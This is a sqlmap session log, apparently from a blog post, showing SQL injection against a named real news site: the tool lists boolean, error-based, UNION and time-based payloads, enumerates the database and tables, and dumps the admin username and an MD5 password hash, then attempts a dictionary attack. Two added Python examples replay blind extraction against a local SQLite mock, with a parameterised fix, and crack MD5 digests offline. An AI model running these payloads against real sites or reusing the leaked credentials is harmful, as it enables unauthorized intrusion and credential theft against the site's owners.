D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the name of the current database user

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

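The first injection point in the log ("id=276 AND 799=799") is the one sqlmap falls back on when the others are unusable: the page renders the article when the appended condition is true and renders nothing when it is false, and that single bit per request is enough to read any value out of the database (the application connects as root@localhost, so nothing in MySQL restricts what it can read). The following is an added example, not code from the original post or from sqlmap, that replays that technique against a local mock of article.php. Everything in it is assumed: the `article` and `admin` tables are rebuilt in an in-memory SQLite database with constructed rows, and SQLite's unicode()/substr() plus a scalar subquery stand in for MySQL's ASCII()/SUBSTRING() and user()/database(). The vulnerable handler is shown beside a parameterised one so the fix is visible too.

```python
"""Boolean-based blind extraction replayed against a local mock of article.php.

Added example; not the post's or sqlmap's code. Schema, rows and the
request counter are constructed here so the script runs offline.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed schema and rows, shaped like the tables the post enumerates."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin (id INTEGER PRIMARY KEY, userid TEXT,
                            password TEXT, type TEXT);
        INSERT INTO article VALUES (276, 'Issue 12 editorial');
        INSERT INTO admin VALUES (1, 'editor',
                                  '5f4dcc3b5aa765d61d8327deb882cf99', 'super');
        """
    )
    return db


def article_vulnerable(db: sqlite3.Connection, id_param: str) -> str:
    """The bug behind every payload in the log: the parameter is spliced into SQL."""
    row = db.execute("SELECT title FROM article WHERE id = " + id_param).fetchone()
    return row[0] if row else ""


def article_fixed(db: sqlite3.Connection, id_param: str) -> str:
    """Validate the type, then bind the value; the SQL text never changes."""
    if not id_param.isdigit():
        return ""
    row = db.execute("SELECT title FROM article WHERE id = ?",
                     (int(id_param),)).fetchone()
    return row[0] if row else ""


class MockTarget:
    """Stands in for http://www.wepost.com.hk/article.php?id=... and counts requests."""

    def __init__(self) -> None:
        self.db = build_db()
        self.requests = 0

    def get(self, id_param: str) -> str:
        self.requests += 1
        return article_vulnerable(self.db, id_param)


def oracle(target: MockTarget, condition: str) -> bool:
    """True when the injected condition held, i.e. the article still rendered."""
    return target.get(f"276 AND ({condition})") != ""


def extract(target: MockTarget, expr: str, max_len: int = 64) -> str:
    """Read the string value of SQL expression `expr` one character at a time.

    Each position is a binary search over code points 0..127 asking
    'is this character >= mid?', so every character costs exactly 7 requests;
    sqlmap bisects over its charset the same way. Past the end of the string
    substr() yields '' and unicode('') is NULL, so the search bottoms out at 0
    and the loop stops.
    """
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if oracle(target, f"unicode(substr(({expr}),{pos},1)) >= {mid}"):
                lo = mid
            else:
                hi = mid - 1
        if lo == 0:
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    t = MockTarget()
    print("userid   :", extract(t, "SELECT userid FROM admin LIMIT 1"))
    print("password :", extract(t, "SELECT password FROM admin LIMIT 1"))
    print("requests :", t.requests)
    print("fixed    :", repr(article_fixed(t.db, "276 AND 799=799")))
```

The request counter is the practical point: a six-character value costs 49 requests here and a 32-character hash over 230, which is why sqlmap prefers the UNION and error-based channels it also found (one request per row) and only falls back to boolean or time-based extraction when it must.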
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" -D "wepost" -v 0 /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of those columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>
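The dumped `password` column is varchar(32) and the stored value is 32 hex characters, the shape of an unsalted MD5 digest; that is why sqlmap asked whether to run a dictionary attack on the retrieved items and whether to try "common password suffixes" (each word tried again with digits or symbols appended). The log shows no cracked value, so the wordlist did not contain it. The following is an added example, not code from the original post or from sqlmap, that does what that prompt does in miniature: recognise the digest format, expand a wordlist with suffixes, and compare digests offline. The wordlist, the suffix list and DEMO_HASH are constructed for the example; the plaintext behind the hash in the post is not known and nothing here claims to recover it.

```python
"""Offline dictionary check of an MD5-shaped hash, with suffix expansion.

Added example; not the post's or sqlmap's code. WORDLIST, SUFFIXES and
DEMO_HASH are constructed so the script runs offline.
"""
import hashlib
import re

PAGE_HASH = "7d4d7589db8b28e04db0982dd0e92189"  # the value dumped in the post
MD5_HEX = re.compile(r"^[0-9a-f]{32}$")

# Constructed inputs for the demonstration only.
WORDLIST = ["admin", "wepost", "password", "wepost2010"]
SUFFIXES = ["1", "123", "!", "2010", "2011"]
DEMO_HASH = hashlib.md5(b"wepost123").hexdigest()  # known plaintext: "wepost123"


def looks_like_md5(digest: str) -> bool:
    """32 hex characters: MD5-shaped. MD4 and NTLM share the length, so this is
    a hint about the format, not proof of it."""
    return bool(MD5_HEX.match(digest.strip().lower()))


def candidates(words, suffixes):
    """Yield each word on its own, then with every suffix appended."""
    for word in words:
        yield word
        for suffix in suffixes:
            yield word + suffix


def crack_md5(digest: str, words, suffixes=()):
    """Return the first candidate whose MD5 equals `digest`, or None."""
    if not looks_like_md5(digest):
        raise ValueError("not an MD5-shaped digest")
    target = digest.strip().lower()
    for cand in candidates(words, suffixes):
        if hashlib.md5(cand.encode("utf-8")).hexdigest() == target:
            return cand
    return None


if __name__ == "__main__":
    print("page hash MD5-shaped:", looks_like_md5(PAGE_HASH))
    print("demo hash cracks to :", crack_md5(DEMO_HASH, WORDLIST, SUFFIXES))
    # With this tiny constructed list the real hash will almost certainly
    # stay unresolved, which is the same outcome the log shows.
    print("page hash cracks to :", crack_md5(PAGE_HASH, WORDLIST, SUFFIXES))
```

The finding a practitioner takes from this step is less the hash itself than the storage scheme: a bare 32-hex column for an admin password means no salt and a fast digest, so a dump of the table is a dump of the credentials for anyone with a larger wordlist than the one shipped with sqlmap.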